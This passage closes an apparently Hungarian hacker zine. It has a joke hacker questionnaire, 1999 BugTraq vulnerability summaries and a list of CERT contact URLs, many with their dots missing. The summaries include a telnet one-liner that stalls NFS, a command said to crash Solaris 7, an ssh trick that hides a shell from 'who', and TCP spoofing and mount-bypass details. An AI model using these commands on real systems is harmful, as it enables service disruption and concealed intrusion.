tudod sorolni valamennyi top-level nameservert a címükkel együtt? 359.Tudod fejből RFC-822 szabványt? 360.fel tudod sorolni az összes hibáját? 361.Irtál már sendmail konfigurációs fájt? 362.működött? 363.egy hét múlva is értetted a konfig fájlt? 364.Tudod, hogy mennyi egy csomag maximális élettartama? 365.Fel tudod sorolni az ISO/OSI szabvány 7 rétegét? 366.érted, hogy mire való a felső két réteg? OPERÁCIOS RENDSZEREK Ismered-e ezeket az operációs rendszereket: 367. BSD Unix? 368. nem-BSD Unix? 369. AIX 370. Linux 371. VM/CMS? 372. VMS? 373. MVS? 374. VSE? 375. RSTS/E? 376. CP/M? 377. COS? 378. NOS? 379. CP-67? 380. RT-11? 381. MS-DOS? 382. Finder? 383. PRODOS? 384. A TRS-80 gépre írt operációs rendszerek közül több mint egyet? 385. Tops-10? 386. Tops-20? 387. OS-9? 388. OS/2? 389. AOS/VS? 390. Multics? 391. ITS? 392. Vulcan? 393.Csináltál már swap partíciót szalagos egységre? 394.szalag lyukasztóra? 395.konzolírógépre? 396.hálózati

meghajtóra? 397.Találtál már programozói hibát valamilyen operációs rendszerben? 398. visszéltél vele? 399. jelentetted? 400. Figyelmen kívül hagyták a jelentésedet? 401.Tettél már tönkre számítógépet? 115 Hackers’ Guide 402. szándékosan? EMBEREK 403.Ismersz embereket? 404.egynél többet? 405.kettőnél többet? SZEMÉLYES KÉRDÉSEK 406.Ki van kötődve a cipőfűződ? 407.Jól tudsz idegenekkel kommunikálni? 408.Tudod-e fejből több mint hat BBS telefonszámát, miközben a saját otthoni számodra nem emlékszel? 409.Be szoktál login-olni reggeli előtt? 410.Napi ötven csészénél több ávét iszol? 411.Szoktál "igen"-nel válaszolni a "vagy-vagy" kérdésekre? 412.Van a birtokodban valamelyik operációs rendszer kézikönyvének legfrissebb kiadása? 413. mindegyik operációs rendszer? 414.Vannak-e problémái másoknak, mikor a te saját magadnak kialakított Windows környezetedben dolgoznak? 415.Szoktál valamilyen

programozási nyelven álmodni? 416.Vannak nehézségeid, mikor háromdimenziós objektumokra kell figyelned? 417.Gyűlölöd az egeret? 418.Undorodsz a CAPS LOCK billentyűtől? 419.Bízol az éttermek menüjében? 420.Lóg-e Mandelbrot rajz a szobád falán? 421.Díszítetted-e valaha a szobád falát mágnesszalaggal vagy lyukkártyával? 422.Lóg-e felakasztva kibelezett lemeztok vagy csupasz mágneslemez a szobádban? 423.Láttad már a valaha a napfelkeltét? 424.duplán? 425.Használod az "forward" szót a hétköznapi beszélgetésekben? (Pl: "Légy szíves forwardold ide a sótartót!") 426.a "mountolni" szót? 427.Használod a P kódot? 428.Automatikusan RTFM-el válaszolsz-e a hozzád intézett kérdésekre? 429.tudod, hogy az RTFM minek a rövidítése? 430.Tudod-e, hogy mi a különbség a "garbage collection" és a "memory management" között? 431.Vannak-e hehézségeid, ha vízszintes helyet akarsz találni a szobádban?

432.Szoktál-e tudományos folyóiratokat olvasni lokálokban, hogy így hívd fel magadra a nők figyelmét? 433.Van-e számítástechnikára utaló jel (matrica, rajz, embléma, stb) a táskádon? 434.Voltál már hazugságvizsgálaton? 116 Hackers’ Guide 435.Voltál-e már egyfolytában 48 órát távol a számítógépedtől? 436.Egyeztettél már találkozót számítógépen keresztül? 437.Szoktál-e számítógépen keresztül beszélgetni a melletted lévő gépnél ülővel? 438.egyszerre többel is? 439.Talk-oltál már több mint egy órán keresztül? 440.több mint kettő? 441.több mint nyolc? 442.több mint huszonnégy? 443.Szoktál IRC-zni? 444.Anyáztál már valakit IRC-ben? 445.rendszeresen szoktál anyázni? PROGRAMOZÁS 446.Tudsz FORTRAN fordítót írni? 447. A DOS EDLIN-jével is? 448.Tudsz hexa dumpot olvasni? 449.fejben disassemblálni? Irtál-e már valaha. 450.fordítót? 451.operációs rendszert? 452. device drivert? 453. szövegszerkesztőt? 454.

képernyőábra leszedőt? 455. adatbázis-kezelőt? 456. szakértői rendszert? 457. élfelismerőt? 458. valós idejű szabályozórendszert? 459. folyószámla nyilvántartót? 460. vírust? 461. vírusirtót? 462.Irtál már bioritmus vagy horoszkóp programot? 463.eladtad-e a készített előrejelzéseket? 464.az eredményeket véletlenszám generátorral csináltad? 465.Kiszámítottad-e már a pí értékét 1000 tizedesnél pontosabban? 466. e értékét? 467.Találtál-e már 1000 jegynél hosszabb prímszámot? 468.Irtál már önmódosító kódot? 469.büszke vagy rá? 470.Irtál-e már olyan programot, ami elsőre futott? 471.és hosszabb volt, mint húsz sor? 472.száz sor? 473.assemblyben írtad? 474.másodjára is működött? 475.Meg tudod oldani a Hanoi Tornyai problémát rekurzív módon? 476.nem rekurzívan? 477. a troff szövegformázó segítségével? 478.Küldtél már pályamunkát a "Ki tud elvetemültebb C kódot írni" versenybe? 117

Hackers’ Guide 479.nyertél? 480. megváltoztatták-e a szabályokat a pályamunkád miatt? 481.Próbáltad már megérteni egy öt évvel ezelőtt írt programodat? 482.sikerült? 483.Töltöttél-e már el tíz percnél többet egy egyszerű gépelési hiba megtalálásával? 484.egy óránál többet? 485.egy napnál többet? 486.egy hétnél többet? 487.az első ember, akinek megmutattad a programodat, azonnal megtalálta-e a hibát? UNIX 488.Tudod használni a Berkeley Unixot? 489.a nem Berkeley Unixot? 490.Tudod mi a különbség a Unix dokumentáció negyedik és ötödik fejezete között? 491.Meg tudod találni TERMIO leírását a System V release 2 dokumentációjában? 492.Mountoltál már valaha mágnesszalagot Unix filesystemként? 493.Lefordítottad valaha a Minix-et? 494.Installáltál már Linuxot? 495.elsőre sikerült? USENET 496.Használod az Internet "news" szolgáltatását? 497. Több mint 32 newsgroupot olvasol? 498. Több mint 256? 499. mindet?

500.Küldtél már be cikket levelezőlistára? 501.rendszeresen küldesz be cikkeket? 502.Megőrzöd a beküldött cikkeidet? 503.Bekapcsolódtál valaha valakinek a cikizésébe? 504.Indítottál már valaha cikiző kampányt valaki ellen? 505.cikiztél ki cikiző levelet? 506.rendszeresen szoktál cikiző leveleket írni? 507.Küldted már be saját programodat valamilyen programozói levelezőlistára? 508.Hamisítottál már levelet? 509.tudod hogy kell? 510.Csináltál már saját levelezőlistát? 511.még most is létezik? 512.olvassa valaki rajtad kívül? URL of this page: http://esca.atomkihu/dlug/kikapcs/hackerhtml last modification: Tuesday, 01-Jul-1997 01:00:00 CEST Page maintained by Istvan Cserny Cliquee 118 Hackers’ Guide * BugTraq lista részletek. forrás: BUGTRAQ (1999.0419) feladó: Chris Wedgwood (chris@CYBERNET.CONZ) SSH probléma (?) Ha az "ssh -lgreg localhost /bin/bash" módon hívunk shell-t a gépen, a jelenlétünk nem fog látszani.

Azaz, pl egy "who" parancs nem mutatja meg az így dolgozó támadót, de az ssh logolja a kapcsolatot. forrás: BUGTRAQ (1999.0415) feladó: Peter van Dijk (peter@ATTIC.VUURWERKNL) További rpc DoS problémák Az UDP alapú szolgáltatások működése az előzőekben leírtaknál könnyebben is felfüggeszthető a következő módon: [root@koek] ~# ( while true ; do echo ; sleep 5 ; done ) | telnet zopie 2049 Trying 10.10131 Connected to zopie.atticvuurwerknl Escape character is ^]. NFS server zopie not responding, still trying. Connection closed by foreign host. Azaz egyszerűen telnetelni kell a szolgáltatás portjára és 5 másodpernyi szemetet küldeni. Amíg a szemét küldését nem szakítjuk meg, a szolgáltatás nem használható. forrás: BUGTRAQ (1999.0318) feladó: matthew green (mrg@ETERNA.COMAU) A noexec flag hibás kezelése NetBSD-n Érintett verziók: NetBSD 1.33 és a korábbi verziók, NetBSD-current 19990318-ig Mivel a mount rendszerhívás nem

igényel privilégiumokat, így egy mezei user is tud mountolni, ha célkönyvtár usere saját maga és a célhoz van olvasási joga. A mountolt filerendszerre már nem lesz érvényes a noexec flag, annak ellenére, hogy a célkönyvtár filerendszere azzal lett mountolva. Patch: ftp://ftp.NetBSDORG/pub/NetBSD/misc/security/patches/19990317-mount A patch a mount rendszerhívást módosítja, így a mountolt filerendszer örökli a noexec flag-et. 119 Hackers’ Guide forrás: BUGTRAQ (1999.0310) feladó: Toomas Soome (tsoome@UT.EE) procfs hiba a 64 bites Solaris 7-ben A hiba lehetővé teszi, hogy a mezei userek egy more /proc/self/psinfo paranccsal lecrasheljék a gépet. Tesztelve UE3000-en, U10-en és UE450-en forrás: BUGTRAQ (1999.0310) feladó: Security Research Labs (seclabs@NAI.COM) Spoof-olható Linux TCP kapcsolatok Egy implementációs hiba a 2.035-ös és kisebb verziójú kernelekben lehetővé teszi, hogy a támadó a TCP sequence number kitalálása nélkül, a

kapcsolat létrejötte előtt adatokat küldjön a alkalmazási rétegnek. Bővebben: A Linux csak az acknowledgement number-t ellenőrzi, ha az érkező csomagokban az ACK flag be van állítva. A nyugtázási információk nélküli TCP csomagok tartalma is queue-ba kerül a kapcsolat létrejötte előtt, az első SYN szerver által való nyugtázása után. Ha ezután a rendszer kap egy csomagot, amelyikben a FIN flag be van állítva, a kapcsolat létrejöttétől függetlenül átadja az adatokat az alkalmazási rétegnek. A szabvány szerint csak a kapcsolatkérő SYN csomag esetében fogadható el adat, ha az ACK flag nincs beállítva. A rendszernek minden más esetben el kellene dobnia az ACK flag nélküli csomagokat. Ha egy TCP csomagban be van állítva az ACK flag, akkor az acknowledgement number-nek (a következő adatbyte sorszáma, amit a másik féltől várunk) is korrektnek kell lennie. Összefoglalva: A hibás Linux kernelek elfogadják az ACK nélküli csomagokat

is. Mivel a csomagban nincs ACK, az acknowledgement sequence number nem lesz ellenőrizve. Ez lehetővé teszi, hogy a támadó csomagokat küldjön egy spoof-olt kapcsolaton keresztül, anélkül, hogy előre tudná a célpont kapcsolat kezdeti vagy aktuális sequence number-ét. A Linux nem továbbítja az adatokat, ha a kapcsolat SYN RECEIVE állapotban van. Ezért a támadó csak akkor tudja sikeresen spoof-olni a TCP forgalmat, ha végigcsinálja a TCP handshake-et. Csakhogy egy implementációs hiba néhány Linux kernelben lehetővé teszi, hogy a támadó teljesen elhagyja a TCP handshake-et, ha egy idő előtti FIN csomaggal lezárja a kapcsolatot. Amikor a FIN csomag továbbítódott egy SYN RECEIVE állapotú kapcsolatnak, a Linux úgy gondolja, hogy a kapcsolat ESTABLISHED állapotú volt és a kapcsolat CLOSE WAIT állapotba kerül. Ebben az állapotban a kapcsolat queue-ban lévő adatai továbbítódnak az alkalmazásnak. Ha a FIN csomagban az ACK flag nem volt

beállítva, a cél sequence number-ét a rendszer nem ellenőrzi. Ma délután már az exploit kódot is megírták, szóval upgrade!. Megoldás: kernel upgrade legalább 2.036-ra 120 Hackers’ Guide * Hasznos URL-ek gyüjteménye a számítógépes biztonság területén: A legteljesebb és a legtöbb dologra kiterjedõ lista, amit a hálón találni lehet: Spafs MEGA hotlist COAST Hotlist Computer Security, Law & Privacy http://www.cspurdueedu/homes/spaf/hotlist/csechtml FIRST (Forum of Incident Response and Security Teams) http://www.firstorg A "FIRST" összefoglalja az összes olyan csoportosulást, amely a számítógépes biztonság területén dolgozik, és a nem kívánt események elhárításában, illetve megelõzésében vesz részt. Computer Emergency Response Teams - az óceánon túl AUSCERT (Australian Computer Emergency Response Team) http://auscert.orgedu Az ausztrál csoport, amely helyileg segít a sikeres támadások kivédésében. Igen

kiváló számítógépes biztonsággal foglalkozó dokumentumokat tart a Webszerverén. CERT (CERT Cordination Center) http://www.certorg PCERT http://www.cspurdueedu/pcert/pcerthtml A Purdue University oktatóiból és dolgozóibó alakult csoport. 121 Hackers’ Guide CIAC (U.S Department of Energy) http://ciac.llnlgov AFCERT (U.S Air Force Cert) http://www.afcertkellyafmil Computer Emergency Response Teams - Európa Hollandia CERT-NL (SURFnet Computer Emergency Response Team) http://www.nicsurfnetnl/surfnet/cert-nlhtml Németország DFN-CERT http://www.certdfnde/ http://www.certdfnde/eng BSI-CERT http://www.certdfnde/eng/csir/europe/bsicerthtml Horvátország CARNet CERT http://www.mzthr/~gaus/hrverthtml Dánia, Finnország, Grönland, Norvégia, Svédország NORDUnet-CERT http://www.nordunet/cert 122 Hackers’ Guide Franciaország RENATER http://web.ucerfr/Renater/sec/certrenaterhtml Olaszország CERT-IT http://idea.secdsiunimiit/cert-ithtml Lengyelország

CERT-NASK http://www.naskpl/NASK/CERT/anghtml Svájc SWITCH-CERT http://www.switchch/switch/cert/SWITCH-CERThtml Svájc SWITCH-CERT http://www.switchch/switch/cert/SWITCH-CERThtml Spanyolország IRIS-CERT http://www.redirises/cert/contacthtml Nagy-Britannia JANET-CERT http://www.janet/CERT/JANET-CERT/JANET-CERT Contact infohtml FOLYT. KÖV 123 Hackers’ Guide Ezek a linkek a VÉDD MAGAD AZ INTERNETEN címû könyv függelékébõl valóak. Úgy gondolom, hogy ez is hasznos lehet az eredményes hackeléshez. - NetHyena – End of Volume #3 124